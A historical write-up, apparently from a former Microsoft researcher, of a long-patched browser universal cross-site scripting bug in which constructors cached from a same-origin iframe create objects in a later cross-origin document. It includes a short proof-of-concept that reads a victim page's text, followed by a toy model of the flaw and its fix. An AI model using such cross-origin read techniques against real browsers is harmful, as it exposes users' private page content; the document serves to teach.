A variant of the cached-collection UXSS: caching a reference to a constructor function (Image, Option, XMLHttpRequest) from a same-origin IFrame, then redirecting the IFrame cross-origin, left a constructor that instantiated objects belonging to the new document. Calling the constructor after the redirect returned an element whose ownerDocument was the cross-origin document.

```javascript
// Cache the constructor while on the same origin
var xImage = window[0].Image;

// Redirect the IFrame to another origin
window[0].location = "http://www.victim.com/";

// After redirect, instantiate via the cached constructor
setTimeout(function() {
    alert(xImage().ownerDocument.body.innerText); // Cross-origin read!
}, 2000);
```

The same technique worked with Option and XMLHttpRequest. The constructor functions held a reference to their parent document that was not updated when the IFrame navigated. Calling them after a cross-origin navigation produced objects that pointed into the new document’s memory, bypassing same-origin checks.
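
The root cause described above, reduced to a toy model in plain JavaScript with the flawed binding beside a corrected one. This is an added example, not browser source or code from the original post: the `Doc` and `Frame` classes, the function names and the origins are hypothetical, and it assumes the cached constructor resolved its document through the frame at call time.

```javascript
// Toy model of the flaw and its fix. Not browser code; all names are hypothetical.
class Doc {
  constructor(origin, bodyText) { this.origin = origin; this.bodyText = bodyText; }
}
class Frame {
  constructor(doc) { this.doc = doc; }
  navigate(doc) { this.doc = doc; } // same frame object, different document
}

// Same-origin check the model applies when a reference is handed out.
function checkAccess(callerOrigin, doc) {
  if (doc.origin !== callerOrigin) throw new Error("SecurityError: cross-origin");
}

// Flawed: the origin is checked once, at acquisition. The constructor keeps the
// frame and looks up the owning document on every call (assumed mechanism).
function getImageCtorFlawed(frame, callerOrigin) {
  checkAccess(callerOrigin, frame.doc);
  return () => ({ tagName: "IMG", ownerDocument: frame.doc });
}

// Fixed: the constructor is bound to the document that passed the check, so a
// later navigation of the frame cannot change what it creates.
function getImageCtorFixed(frame, callerOrigin) {
  checkAccess(callerOrigin, frame.doc);
  const pinned = frame.doc;
  return () => ({ tagName: "IMG", ownerDocument: pinned });
}

// Constructed scenario: cache the constructor, navigate the frame, then call it.
// Returns the origin of the document that owns the new element.
function ownerOriginAfterNavigation(getCtor) {
  const parentOrigin = "https://parent.example";
  const frame = new Frame(new Doc(parentOrigin, "same-origin page"));
  const ctor = getCtor(frame, parentOrigin);
  frame.navigate(new Doc("https://other.example", "cross-origin page"));
  return ctor().ownerDocument.origin;
}

console.log("flawed:", ownerOriginAfterNavigation(getImageCtorFlawed));
console.log("fixed: ", ownerOriginAfterNavigation(getImageCtorFixed));
```

In the flawed variant the check and the use are separated by the navigation, which is the time-of-check/time-of-use gap the fix closes.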

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.